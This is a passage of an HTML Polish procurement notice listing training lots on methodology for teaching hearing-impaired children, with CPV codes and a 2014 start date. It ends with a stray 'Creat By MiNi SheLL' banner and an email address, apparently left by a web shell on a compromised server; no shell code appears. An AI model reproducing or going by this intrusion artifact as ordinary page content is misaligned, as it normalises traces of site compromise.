1.	Rozwijanie sprawności językowej i usprawnianie wrażliwości słuchowej w nauczaniu początkowym.
2.	Rola rytmiki i logorytmiki w realizacji celów programowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.03.2014.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> Metodyka nauczania i wychowania dzieci z wadą słuchu IV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Tematyka: 
1.	Związki środowiska  społeczno-przyrodniczego z językiem polskim i innymi przedmiotami na etapie nauczania początkowego.
2.	Formy ćwiczeń słownikowych i ich stosowanie.
3.	Metodyka nauczania odczytywania wypowiedzi z ust.
4.	Niedociągnięcia w procesie dydaktycznym i wynikające z nich trudności w nauce domowej dzieci z wadą słuchu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.03.2014.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> Metodyka nauczania i wychowania dzieci z wadą słuchu V.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Tematyka: 
1.	Lekcja w klasach wyższych - jej właściwości metodyczne i psychologiczne. Przygotowanie i analiza konspektów, rozkładów materiałów i ocena lekcji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.03.2014.</li></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com